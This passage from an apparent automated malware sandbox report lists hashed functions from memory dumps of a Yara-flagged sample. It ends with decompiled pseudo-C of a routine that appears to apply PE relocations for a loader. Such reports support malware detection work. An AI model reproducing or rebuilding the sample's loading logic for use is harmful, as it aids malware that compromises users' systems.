                                          • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                          • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                          • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                          • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                          • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                          • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                          • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                          • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                          • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                          • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                          • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                          • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                          • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                          • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                          • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                          • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                          • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                          • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                          • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                          • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                          • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                          • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                          • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                          • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                          • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                          • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                          • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                          • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                          • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                          • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                          • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                          • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                          • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                          • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                          • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                          • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                          • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                          • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                          • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                          • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A0A2, Relevance: 3.0, APIs: 2, Instructions: 33memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitFreeHeapProcess
                                          • String ID:
                                          • API String ID: 1180424539-0
                                          • Opcode ID: f6c6b7e9f874acbb5e24f6df81b5b962566956426bafd594253759f7466abdfb
                                          • Instruction ID: dfe6be87eaf613e9bff17485f2058308e710aadc39f86a931e87ebc63131f13e
                                          • Opcode Fuzzy Hash: f6c6b7e9f874acbb5e24f6df81b5b962566956426bafd594253759f7466abdfb
                                          • Instruction Fuzzy Hash: 5AF0BEB51442046FCB00DF68CC81DD73BA8EF85300F19859AFC9857302C136EA65CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004082B7, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 5dafad8645157707924cbe77efcaeb88fa797189e40deac6fd650b3f2405c07f
                                          • Instruction ID: a4ea6720f2cb17485ea8348e4560222eafeca804d913bde84d5f9ae5ffc66487
                                          • Opcode Fuzzy Hash: 5dafad8645157707924cbe77efcaeb88fa797189e40deac6fd650b3f2405c07f
                                          • Instruction Fuzzy Hash: 9F014C3168022876EB20A6589C43FFE372CAB40F14F04005EFE04FE2C2DABD291542ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                          • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                          • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                          • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A1C8, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 49d7c87dadd2f95b5c230768ba1e4e049cbb5e8a33f2a44fd09e165ddfd03276
                                          • Instruction ID: 2a4175f8681e5a020579612713c11a09e62331df14dd06152294c6132fcf9ec3
                                          • Opcode Fuzzy Hash: 49d7c87dadd2f95b5c230768ba1e4e049cbb5e8a33f2a44fd09e165ddfd03276
                                          • Instruction Fuzzy Hash: 8AF087B12002186BCB10EF95DC85DEB3768EF84624F01889AF9085B242C635A920CBF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AD4B, Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 40ddbc86f9352e3fcdcc8f5a7d791e9644b24642f8cebb6f52011add2a06063a
                                          • Instruction ID: dfe65de649071f523f36b8f1b58759fc7357ba5e076af99d53e30a05308cd4c9
                                          • Opcode Fuzzy Hash: 40ddbc86f9352e3fcdcc8f5a7d791e9644b24642f8cebb6f52011add2a06063a
                                          • Instruction Fuzzy Hash: 31F0E5B5E0020DBBEB10CB94EC42F9EB774EB80708F108295E90CA7282F634EA158785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                          • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                          • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                          • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414040, Relevance: .3, Instructions: 271COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00414040(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed short _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v64;
				char _v68;
				void* __edi;
				char _t133;
				char _t135;
				char _t136;
				char _t138;
				char _t141;
				char _t142;
				signed int _t152;
				intOrPtr _t154;
				signed int _t175;
				signed short _t182;
				signed int _t185;
				intOrPtr _t186;
				char _t193;
				char _t204;
				intOrPtr _t210;
				signed int _t235;
				void* _t236;
				signed int _t237;
				signed short _t239;
				signed int _t240;
				signed int _t241;
				void* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t251;

				_t185 = _a8;
				_t239 = 0;
				if(_t185 != 0) {
					L0041B540( &_v68, _t185);
					_t186 = _v64;
					_t210 =  *((intOrPtr*)(_t186 + 0xa4));
					_v52 = _t210;
					_t133 = _a12 -  *((intOrPtr*)(_t186 + 0x34));
					_t247 = _t246 + 8;
					_v56 = _t133;
					_v48 =  *((intOrPtr*)(_t186 + 0xa0)) + _t185;
					_v44 = 0;
					_v40 = 8;
					if(_t210 != 0 && _t133 != 0) {
						_t234 = _a4;
						_t135 = L0041C930(_a4, 8); // executed
						_v12 = _t135;
						_t136 = L0041C930(_a4, 4);
						_t248 = _t247 + 0x10;
						_v28 = _t136;
						if(_v52 > 0) {
							_v24 = 0;
							do {
								L0041C9D0(_t234, _t234,  &_v12, _t239 + _v48);
								_push( &_v36);
								_push( &_v28);
								_v36 = _t239 + _v48;
								L0041CA60(_t234, _t234);
								_t182 = _v24;
								_t239 = _t239 +  *((intOrPtr*)(_t182 + _v12 + 4));
								_t248 = _t248 + 0x18;
								_v24 = _t182 + 8;
							} while (_t239 < _v52);
						}
						_v44 = L0041C9B0( &_v12);
						_t138 = L0041C930(_t234, 2); // executed
						_t235 = 0;
						_t249 = _t248 + 0xc;
						_v16 = _t138;
						if(_v44 > 0) {
							_t175 = _v40 & 0x0000ffff;
							_t204 = _v12;
							do {
								_t245 = 0;
								if(_t175 <  *((intOrPtr*)(_t204 + 4 + _t235 * 8))) {
									do {
										_push( *((intOrPtr*)(_v28 + _t235 * 4)) + _t175 + _t245);
										_push( &_v16);
										L0041CA60(_t235, _a4); // executed
										_t175 = _v40 & 0x0000ffff;
										_t204 = _v12;
										_t245 = _t245 + 2;
										_t249 = _t249 + 0xc;
									} while (_t175 + _t245 <  *((intOrPtr*)(_t204 + 4 + _t235 * 8)));
									_t185 = _a8;
								}
								_t235 = _t235 + 1;
							} while (_t235 < _v44);
						}
						_t236 = L0041C9B0( &_v16);
						_t141 = L0041C930(_a4, 2);
						_t250 = _t249 + 0xc;
						_t240 = 0;
						_v32 = _t141;
						if(_t236 != 0) {
							do {
								_push( &_a8);
								_a8 =  *(_v16 + _t240 * 2) >> 0x0000000c & 0x0000ffff;
								_push( &_v32);
								L0041CA60(_t236, _a4); // executed
								_t240 = _t240 + 1;
								_t250 = _t250 + 0xc;
							} while (_t240 < _t236);
						}
						_t142 = L0041C930(_a4, 2);
						_t251 = _t250 + 8;
						_t241 = 0;
						_v20 = _t142;
						if(_t236 != 0) {
							do {
								_push( &_a8);
								_a8 =  *(_v16 + _t241 * 2) & 0xfff;
								_push( &_v20);
								L0041CA60(_t236, _a4); // executed
								_t241 = _t241 + 1;
								_t251 = _t251 + 0xc;
							} while (_t241 < _t236);
						}
						_t237 = 0;
						_v24 = 0;
						if(_v44 > 0) {
							do {
								_t193 = _v12;
								_v36 = 0;
								if((_v40 & 0x0000ffff) <  *((intOrPtr*)(_t193 + 4 + _t237 * 8))) {
									do {
										_t244 = (_v24 & 0x0000ffff) + (_v24 & 0x0000ffff);
										_t152 =  *(_t244 + _v32) & 0x0000ffff;
										if(_t152 != 0) {
											if(_t152 != 1) {
												if(_t152 != 2) {
													if(_t152 == 3) {
														 *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_t193 + _t237 * 8)) + _t185)) =  *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_t193 + _t237 * 8)) + _t185)) + _v56;
													}
												} else {
													L0041B7E0( &_v8,  &_v48, _t152);
													_t251 = _t251 + 0xc;
													 *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_v12 + _t237 * 8)) + _t185 + 2)) =  *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_v12 + _t237 * 8)) + _t185 + 2)) + _v8;
												}
											} else {
												L0041B7E0( &_a8,  &_v56, 2);
												_t251 = _t251 + 0xc;
												 *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_v12 + _t237 * 8)) + _t185)) =  *((intOrPtr*)(( *(_t244 + _v20) & 0x0000ffff) +  *((intOrPtr*)(_v12 + _t237 * 8)) + _t185)) + _a8;
											}
										}
										_t193 = _v12;
										_v24 = _v24 + 1;
										_t154 = _v36 + 2;
										_v36 = _t154;
									} while ((_v40 & 0x0000ffff) + _t154 <  *((intOrPtr*)(_t193 + 4 + _t237 * 8)));
								}
								_t237 = _t237 + 1;
							} while (_t237 < _v44);
						}
						_t242 = _a4;
						 *((intOrPtr*)(_v64 + 0x34)) = _a12;
						L0041C990(_a4,  &_v12);
						L0041C990(_a4,  &_v28);
						L0041C990(_a4,  &_v16);
						L0041C990(_a4,  &_v32);
						L0041C990(_t242,  &_v20);
					}
					return 1;
				} else {
					return 0;
				}
			}
















































                                          0x00414047
                                          0x0041404b
                                          0x0041404f
                                          0x0041405e
                                          0x00414063
                                          0x00414066
                                          0x0041406f
                                          0x00414072
                                          0x00414075
                                          0x00414078
                                          0x00414083
                                          0x0041408b
                                          0x0041408e
                                          0x00414094
                                          0x004140a3
                                          0x004140a8
                                          0x004140b0
                                          0x004140b3
                                          0x004140b8
                                          0x004140bb
                                          0x004140c1
                                          0x004140c3
                                          0x004140c6
                                          0x004140d2
                                          0x004140e0
                                          0x004140e4
                                          0x004140e6
                                          0x004140e9
                                          0x004140ee
                                          0x004140f4
                                          0x004140fb
                                          0x004140fe
                                          0x00414101
                                          0x004140c6
                                          0x00414112
                                          0x00414115
                                          0x0041411a
                                          0x0041411c
                                          0x0041411f
                                          0x00414125
                                          0x00414127
                                          0x0041412b
                                          0x00414130
                                          0x00414130
                                          0x00414136
                                          0x00414140
                                          0x0041414d
                                          0x00414151
                                          0x00414153
                                          0x00414158
                                          0x0041415c
                                          0x0041415f
                                          0x00414165
                                          0x00414168
                                          0x0041416e
                                          0x0041416e
                                          0x00414171
                                          0x00414172
                                          0x00414130
                                          0x00414186
                                          0x00414188
                                          0x0041418d
                                          0x00414190
                                          0x00414192
                                          0x00414197
                                          0x004141a0
                                          0x004141b1
                                          0x004141b5
                                          0x004141bb
                                          0x004141bd
                                          0x004141c2
                                          0x004141c3
                                          0x004141c6
                                          0x004141a0
                                          0x004141d0
                                          0x004141d5
                                          0x004141d8
                                          0x004141da
                                          0x004141df
                                          0x004141e1
                                          0x004141f6
                                          0x004141fa
                                          0x00414200
                                          0x00414202
                                          0x00414207
                                          0x00414208
                                          0x0041420b
                                          0x004141e1
                                          0x0041420f
                                          0x00414211
                                          0x00414217
                                          0x00414220
                                          0x00414224
                                          0x00414227
                                          0x00414232
                                          0x00414240
                                          0x00414247
                                          0x00414249
                                          0x00414250
                                          0x00414255
                                          0x00414283
                                          0x004142b3
                                          0x004142c2
                                          0x004142c2
                                          0x00414285
                                          0x0041428e
                                          0x004142a8
                                          0x004142ab
                                          0x004142ab
                                          0x00414257
                                          0x00414261
                                          0x00414277
                                          0x0041427a
                                          0x0041427a
                                          0x00414255
                                          0x004142cc
                                          0x004142cf
                                          0x004142d2
                                          0x004142d7
